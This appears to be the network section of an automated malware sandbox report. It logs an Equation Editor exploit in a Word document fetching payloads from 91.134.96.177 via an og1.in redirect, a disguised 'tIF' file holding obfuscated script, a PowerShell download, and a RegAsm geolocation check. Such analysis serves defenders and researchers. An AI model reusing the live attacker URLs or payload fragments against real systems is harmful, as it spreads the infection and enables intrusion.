                                                                                                                                                                                                Data Ascii: 2[1^4*|0][7`3%$?.7(0<]^8!18&[;,~243-:49!'#!%0@(+8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[0;4|04?$~+|43/?_;(@-*^^<5+3;>]%8*]81_-[?=0;&*@<,#.0$,`-^6`;[#?%#_`.'$?&(??064?%6),2$#(*%-2/.`?:?+?[>^31]~>2=+%-?^`~.'2;5&)~05*.4^75]??8<?^*-4&[[~
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250837088 CEST1236INData Raw: 31 24 2d a7 39 3c 23 37 35 38 34 38 24 b0 3f 5e 38 37 36 3f 27 39 3f 60 36 5f 25 5b 3f 34 39 60 7e 3d 7e 3f 3d 28 2b 3f 37 37 28 27 2f 60 60 2a 3f 36 5d 3a 3a 3f 3f 2d 27 b0 40 38 5d 3f 39 38 35 3b 3d b5 23 34 5b 3f 31 5e 39 60 21 3e 40 21 5e 7c
                                                                                                                                                                                                Data Ascii: 1$-9<#75848$?^876?'9?`6_%[?49`~=~?=(+?77('/``*?6]::??-'@8]?985;=#4[?1^9`!>@!^|61!?6$+??4?`*?7(7].?$/-[?[?-1=%@#`:_~5@[&~?2?(~'9@#~:;1<~]?3,,?6*740>+?1@`>17&!&5*:3-?%34=@!&-328=1;35@%?2?4?@7~].3>5_'#6<2^^:&1?_8_%:.-.[<`,/:~`(@40]?`
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250849009 CEST1236INData Raw: 33 3f 3f 21 2e 3b 37 31 40 23 30 26 23 40 33 3f 7e 3e b0 26 60 2b 34 3b 31 3c 2c 38 5b 38 32 5b 21 36 b0 3f 3f 3b 7e 25 26 28 39 21 5d 27 5f 2d 33 25 3a 5d 2f 3c 2a 3c 3b 5d b0 5f 29 2f 25 3b 23 25 26 25 37 38 26 3f 23 26 40 a7 5e 36 7e 23 28 32
                                                                                                                                                                                                Data Ascii: 3??!.;71@#0&#@3?~>&`+4;1<,8[82[!6??;~%&(9!]'_-3%:]/<*<;]_)/%;#%&%78&?#&@^6~#(22~)<9!6+3?_1$5><-@.*?(?#)!]?]6?4:-+$%?,_;4>?&?:30%@'139&|,58+%?*)';~:;07?|,6-#~=80*.*<:`,8[$[&57?)-%./,&4~<-![6?5`*,#6,#:?:#9%>`?2%?!4',(`5*##[%5%|4(|~
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250859976 CEST1236INData Raw: 3f 7e 34 3b 3c 25 b5 60 3a 29 21 37 25 34 36 3b 2c 37 35 3f 21 38 3f 2b 3f 2e 33 2b 25 3c 24 3f 3e 2d 26 3e a7 3f 60 28 25 3f 39 3f 3e 3e 34 2a 7c 3a 7c 26 32 35 37 5f 23 5f 5b 34 25 28 40 3d 60 31 3c 39 b0 25 2f 21 b0 34 28 27 35 3c 33 5e 40 a7
                                                                                                                                                                                                Data Ascii: ?~4;<%`:)!7%46;,75?!8?+?.3+%<$?>-&>?`(%?9?>>4*|:|&257_#_[4%(@=`1<9%/!4('5<3^@3|5*?6~%^>!&9['7<?*-@]<0/#7.]4+9?9'3:0:=0(:@?$`1?_?7?![_6`%0)%~&,2!_+|9?>@-/?..'772%%]+<7-<,^?>||;;@&%8-4??[0.:82_%2=7?17&1:],^<%7?_?:`=]`_,?:?(%5(?)?;09)2>>_
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250870943 CEST1236INData Raw: 7c 3d 38 7e 40 24 35 5e 29 7e 2c 36 3a 31 2e 3a 25 37 40 30 b0 38 38 32 2b 3f 5b 28 28 40 24 27 5b 37 3c b5 3a 32 b0 3e 36 25 31 3f 5d 37 27 b5 3f 3f 36 60 26 34 34 23 32 35 28 25 3f 2d 39 2b 28 3f 32 3f 26 7e 26 37 2e a7 29 b0 2a 30 25 a7 30 39
                                                                                                                                                                                                Data Ascii: |=8~@$5^)~,6:1.:%7@0882+?[((@$'[7<:2>6%1?]7'??6`&44#25(%?-9+(?2?&~&7.)*0%097[)19.[5*%!=2%;825*?4*?4`-%85+(/+?^%`'/777?%)?=!;3?(639?$<!?2?&:9$*8??1&?9/?4=478>>'|1%%1+,8)3%+`/[:%6|#7+`?3]%%@?<)?%5>^)9%)1(?*61|@2?-?6^>/%2'?[67
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250881910 CEST1236INData Raw: a7 23 2e 60 7e 24 2f 40 7c 7e 3c 2c 2c 3f 3b 5e 3c 2e 7e 5b 38 2b 7c 29 38 24 2a 25 60 38 40 35 3f b5 a7 3c 29 36 3d 2f 5e 24 26 2d 3f 29 3f 60 60 3c 32 b0 25 39 3f 21 5e 2e 32 3e 2b 7e a7 35 3a 60 38 21 7e 5b 25 a7 31 34 23 39 7c 27 24 7e 2a a7
                                                                                                                                                                                                Data Ascii: #.`~$/@|~<,,?;^<.~[8+|)8$*%`8@5?<)6=/^$&-?)?``<2%9?!^.2>+~5:`8!~[%14#9|'$~*&%]?)?~?^*`33-/+*?[?+35<|(!=!6&<?^8?,-?1()(@+:~`(!/)9[!:??:*~9!`$??972/??%?48+333,]^|8?&^:0&7#7~'=6#0;+[?[=_0/?..?*#?67!?<'['|%)?74->>4_$?%;3)+_$3%7`(;
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250894070 CEST1236INData Raw: 38 35 31 5c 27 dd 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: 851\' {\object\ms
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250904083 CEST1236INData Raw: 0d 0d 0d 0d 0d 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0a 0a 0a 0a 0a 35 31 09 09 20 20 09 20 09 09 09 20 20 20 20 20 09 09 20 09 09 20 20 20 20 09 20 09 20 20 09 20 20 20 09 20 09 20 09 09 09 20 20 20 20 20 09 09 20 20 20 09 20 09 20 20 09 09 09 20 09 20
                                                                                                                                                                                                Data Ascii: 51 754154
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250916958 CEST1236INData Raw: 09 09 09 09 20 09 09 09 09 20 09 20 09 09 20 09 09 09 20 20 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 30 0d 0d 0a 0a 0d 0d 0a 0a 0a 0d 0d 0d 0d 0a 0d 0a 0a 0a 0d 0a 0d 0a 0d 0a 0a 0d 0a 0d 0d 0a 0a 30 0d 0d 0a 0a 0d 0d 0a 0a 0a 0d 0d 0d 0d
                                                                                                                                                                                                Data Ascii: 000 00
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256484985 CEST1236INData Raw: 0d 0d 0a 0d 0a 0a 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0d 0d 0a 0a 0d 0a 0d 0a 0a 0a 66 36 0a 0d 0a 0a 0a 0a 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 0a 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0d 0a 0a 32 64 20 09 09 20 20 20 09 09 09 09 09 20 20 20 20 09 09 09 20 09 20
                                                                                                                                                                                                Data Ascii: f62d 3 d
Sep 30, 2024 16:24:24.098367929 CEST | 286 | OUT | HEAD /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: 91.134.96.177
Content-Length: 0
Connection: Keep-Alive
Sep 30, 2024 16:24:24.271703005 CEST | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 14:24:24 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 30 Sep 2024 06:43:59 GMT
ETag: "1c3d2-62350879de951"
Accept-Ranges: bytes
Content-Length: 115666
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49171 | 91.134.96.177 | 80 | 3744 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 16:24:26.663450956 CEST | 347 | OUT | GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.134.96.177
Connection: Keep-Alive
Sep 30, 2024 16:24:27.260016918 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 14:24:27 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 30 Sep 2024 06:41:22 GMT
ETag: "3c504-623507e3e561a"
Accept-Ranges: bytes
Content-Length: 247044
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
                                                                                                                                                                                                Data Raw: ff fe 4c 00 6c 00 69 00 6b 00 4e 00 6b 00 66 00 52 00 65 00 43 00 71 00 43 00 4b 00 4c 00 55 00 42 00 47 00 65 00 75 00 63 00 66 00 7a 00 66 00 50 00 20 00 3d 00 20 00 22 00 47 00 4c 00 49 00 6c 00 69 00 66 00 4c 00 55 00 41 00 57 00 6e 00 70 00 68 00 6b 00 47 00 55 00 78 00 41 00 63 00 42 00 4b 00 41 00 4c 00 69 00 22 00 0d 00 0a 00 69 00 66 00 47 00 74 00 4c 00 4b 00 57 00 57 00 55 00 43 00 47 00 50 00 6d 00 4e 00 6d 00 67 00 61 00 6b 00 69 00 7a 00 6f 00 4f 00 57 00 43 00 20 00 3d 00 20 00 22 00 65 00 52 00 4b 00 74 00 57 00 75 00 43 00 47 00 57 00 4b 00 57 00 4b 00 42 00 63 00 4f 00 50 00 6a 00 69 00 50 00 57 00 4f 00 4c 00 6c 00 69 00 22 00 0d 00 0a 00 4b 00 57 00 78 00 7a 00 4c 00 66 00 6b 00 41 00 66 00 4e 00 6d 00 54 00 66 00 57 00 61 00 4c 00 66 00 67 00 54 00 63 00 4f 00 69 00 68 00 69 00 20 00 3d 00 20 00 22 00 4c 00 47 00 4f 00 7a 00 6d 00 42 00 41 00 6a 00 47 00 4c 00 6c 00 51 00 47 00 57 00 6f 00 68 00 66 00 7a 00 57 00 57 00 6b 00 50 00 55 00 73 00 22 00 0d 00 0a 00 43 00 57 00 5a 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: LlikNkfReCqCKLUBGeucfzfP = "GLIlifLUAWnphkGUxAcBKALi"ifGtLKWWUCGPmNmgakizoOWC = "eRKtWuCGWKWKBcOPjiPWOLli"KWxzLfkAfNmTfWaLfgTcOihi = "LGOzmBAjGLlQGWohfzWWkPUs"CWZpGAblBWhRdKvcNWWhcoAT = "oUaUeWhWcKCTcIdcqahUaRhB"iLUxdzmLuiqxccALCvNcioUA = "GWcNPfNKomLUPJZhOdppCoiK"cLtUNcCxeWZdBTpgULZWqbUK = "OKWWpWloKLfWAPzkUeLLURmW"iuKsxshJcKBnGkmmrGHlChNq = "GkcfUkWihzRzGGCLCUcZPGiW"WuiLKfaWWcGZWZJfIPCZOfhN = "aNbKKbfkWLKzKuCpWRmNfLWL"LqmPKzvmAKGWNNWGAlLi
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260081053 CEST1236INData Raw: 00 6f 00 57 00 41 00 6b 00 20 00 3d 00 20 00 22 00 73 00 53 00 5a 00 49 00 63 00 69 00 57 00 4b 00 4c 00 4b 00 4f 00 4c 00 6f 00 57 00 4e 00 62 00 4b 00 43 00 55 00 4c 00 6b 00 74 00 71 00 64 00 22 00 0d 00 0a 00 64 00 51 00 7a 00 4f 00 78 00 64
                                                                                                                                                                                                Data Ascii: oWAk = "sSZIciWKLKOLoWNbKCULktqd"dQzOxdzoLkcWcqKeCLqWiecK = "RgNKkecUKLjWbLrdSLAtTxPq"mkNHHLLApciqShioGkeRdWiG = "U
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260114908 CEST1236INData Raw: 00 54 00 47 00 63 00 41 00 6b 00 52 00 41 00 4c 00 4c 00 6b 00 4c 00 62 00 57 00 57 00 66 00 65 00 63 00 4b 00 57 00 73 00 76 00 22 00 0d 00 0a 00 0d 00 0a 00 64 00 62 00 4e 00 6d 00 48 00 43 00 68 00 5a 00 4f 00 70 00 52 00 4c 00 4b 00 74 00 63
                                                                                                                                                                                                Data Ascii: TGcAkRALLkLbWWfecKWsv"dbNmHChZOpRLKtcUZbCfTLNl = "ZCkhGuupoLWUWimLlcBrkWUh"KjisHPKqLBRcctbKxPiLiWLd = "WpIkWGWGGgkm
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260150909 CEST672INData Raw: 00 70 00 67 00 53 00 63 00 6e 00 62 00 66 00 4f 00 6c 00 53 00 70 00 54 00 57 00 6b 00 6b 00 4b 00 5a 00 22 00 0d 00 0a 00 61 00 6f 00 5a 00 51 00 5a 00 65 00 4c 00 65 00 4c 00 6c 00 70 00 50 00 64 00 4c 00 61 00 72 00 4c 00 64 00 49 00 57 00 71
                                                                                                                                                                                                Data Ascii: pgScnbfOlSpTWkkKZ"aoZQZeLeLlpPdLarLdIWqBim = "eGobhrccWbNNBhhKZaPWbkGR"KbqbevifjOIrhOxiTaeWcziq = "WzeaWIepGprfxZNcgb
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260188103 CEST1236INData Raw: 00 62 00 4f 00 70 00 7a 00 70 00 55 00 69 00 4f 00 68 00 47 00 69 00 22 00 0d 00 0a 00 66 00 41 00 57 00 74 00 63 00 49 00 57 00 6f 00 41 00 52 00 69 00 49 00 6f 00 4c 00 50 00 4e 00 43 00 68 00 4c 00 6f 00 57 00 4f 00 65 00 54 00 20 00 3d 00 20
                                                                                                                                                                                                Data Ascii: bOpzpUiOhGi"fAWtcIWoARiIoLPNChLoWOeT = "WUpGBKPpWaGiamLlLbWKfQfq"WxgamfCQGLUWekttLLBkLiON = "CWaIePgcelWjfokZWUSZhLAi
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260221004 CEST1236INData Raw: 00 22 00 0d 00 0a 00 55 00 4c 00 57 00 57 00 52 00 74 00 5a 00 65 00 5a 00 69 00 57 00 6f 00 57 00 6d 00 53 00 65 00 4c 00 4c 00 4b 00 78 00 65 00 57 00 5a 00 69 00 20 00 3d 00 20 00 22 00 68 00 63 00 47 00 57 00 4b 00 6b 00 6f 00 57 00 4b 00 71
                                                                                                                                                                                                Data Ascii: "ULWWRtZeZiWoWmSeLLKxeWZi = "hcGWKkoWKqLiKRHoqclZWiTh"GxLGxWcWiRNWjALtdbxQmuOh = "tWWmunUbzlaivWGbzPBcWarf"tokgvL
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260256052 CEST1236INData Raw: 00 65 00 62 00 4c 00 61 00 6f 00 52 00 63 00 6e 00 7a 00 5a 00 76 00 4b 00 57 00 55 00 4b 00 5a 00 20 00 3d 00 20 00 22 00 52 00 4e 00 63 00 69 00 55 00 65 00 62 00 70 00 70 00 78 00 4b 00 69 00 7a 00 41 00 6b 00 76 00 6d 00 4b 00 69 00 55 00 57
                                                                                                                                                                                                Data Ascii: ebLaoRcnzZvKWUKZ = "RNciUebppxKizAkvmKiUWLGO"nqxlRdpZLmCbTRPNvLJfAUcb = "WaibcikeGotpgAWIiiWomWBW"NuiAihLhpKdLclfhkLW


Session ID: 2 | Source: 192.168.2.22:49173 | Destination: 91.134.96.177:80 | PID: 3952 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 16:24:35.680459023 CEST | 76 | OUT | GET /80/WRRDFC.txt HTTP/1.1
Host: 91.134.96.177
Connection: Keep-Alive
Sep 30, 2024 16:24:36.270281076 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 14:24:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Mon, 30 Sep 2024 06:38:44 GMT
ETag: "a1000-6235074c9d7b5"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID: 3 | Source: 192.168.2.22:49176 | Destination: 178.237.33.50:80 | PID: 4076 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 16:24:38.658246994 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Sep 30, 2024 16:24:39.279786110 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Mon, 30 Sep 2024 14:24:39 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID: 0 | Source: 192.168.2.22:49163 | Destination: 172.67.216.244:443 | PID: 3272 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:08 UTC | 128 | OUT | OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: og1.in
Content-Length: 0
Connection: Keep-Alive
2024-09-30 14:24:09 UTC | 795 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 14:24:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
allow: GET,HEAD
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzHWC%2BLoa340TJe1A2B1T37rFcr%2FhZsmzHvF1DxGRBv4pN7povbrZoI%2BozEzbR2Ytv1IVIBlDUtqJl3KnMF6B9jxzPg6Sj99oQ8d7aCaxak20kCvzoz8j4g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb4dff5eee6c32c-EWR
alt-svc: h3=":443"; ma=86400
2024-09-30 14:24:09 UTC | 13 | IN | Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
Data Ascii: 8GET,HEAD
2024-09-30 14:24:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1 | Source: 192.168.2.22:49164 | Destination: 104.21.78.54:443 | PID: 3272 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:11 UTC | 113 | OUT | HEAD /S7UYq0 HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: og1.in
2024-09-30 14:24:11 UTC | 947 | IN | HTTP/1.1 302 Found
Date: Mon, 30 Sep 2024 14:24:11 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 196
Connection: close
location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
strict-transport-security: max-age=15552000; includeSubDomains
vary: Accept
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xleqArMqGoyUBifzkGc4gTRfgCmmSU8AaHaa%2F%2F3xv8c5udWIIFJ5Boef13HxfPCBJVaF9dabS%2F7Wrw%2B0fSUFTIot7uG7h7wQIOZ3LMLj8GVCChdMsk7bb4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8cb4e0055dab0f37-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.22 | 49165 | 172.67.216.244 | 443

Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:15 UTC | 123 | OUT | OPTIONS / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    translate: f
    Host: og1.in
2024-09-30 14:24:17 UTC | 765 | IN | HTTP/1.1 200 OK
    Date: Mon, 30 Sep 2024 14:24:17 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    allow: GET,HEAD
    strict-transport-security: max-age=15552000; includeSubDomains
    x-content-type-options: nosniff
    x-dns-prefetch-control: off
    x-download-options: noopen
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bo6d8Zp%2BBUu45VaUa3p%2FfOWUV3FQ7u96DQ2WqreihGmq5bLlQXgPUgzyUs%2FO1IrlXBuxPiZwN7SYVOctnBxYhn1ZWNg7eOTVF3eUaR3D0RtF3kEEcA1kgFw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cb4e02449a64344-EWR
2024-09-30 14:24:17 UTC | 13 | IN | Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
    Data Ascii: 8GET,HEAD
2024-09-30 14:24:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.22 | 49166 | 104.21.78.54 | 443

Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:18 UTC | 153 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 67 31 2e 69 6e 0d 0a 0d 0a
    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: og1.in
2024-09-30 14:24:18 UTC | 798 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 30 Sep 2024 14:24:18 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    content-security-policy: default-src 'none'
    strict-transport-security: max-age=15552000; includeSubDomains
    x-content-type-options: nosniff
    x-dns-prefetch-control: off
    x-download-options: noopen
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEDnYP2a2eWLiLrKs9YJnu3mWIgCiF2subT99aKzhKPzYf0hTkAp%2BDWePLXPVtmBYN5XRFiEPyhP56mSGe2KFWViHcbBotu8ZICa0e8yFyOOA2PbwqP5xUk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cb4e0316c2141cd-EWR
2024-09-30 14:24:18 UTC | 150 | IN | Data Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
    Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
2024-09-30 14:24:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.22 | 49167 | 104.21.78.54 | 443

Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:19 UTC | 153 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6f 67 31 2e 69 6e 0d 0a 0d 0a
    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: og1.in
2024-09-30 14:24:20 UTC | 798 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 30 Sep 2024 14:24:20 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    content-security-policy: default-src 'none'
    strict-transport-security: max-age=15552000; includeSubDomains
    x-content-type-options: nosniff
    x-dns-prefetch-control: off
    x-download-options: noopen
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NRKoUHUfmwUlOfnRKK1g5ZJQMjYMlATd0rHuiKHyLok3qZv84ugmaFM%2BKhKwZ9DBqhGYoKLtobw1uLfGvPHk7T3nqN3LheJooVVDhypdxPHxk%2FckOexKUQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cb4e039ca8c431f-EWR
2024-09-30 14:24:20 UTC | 150 | IN | Data Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
    Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
2024-09-30 14:24:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49168 | 172.67.216.244 | 443 | 3272 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:20 UTC | 343 | OUT | GET /S7UYq0 HTTP/1.1
    Accept: */*
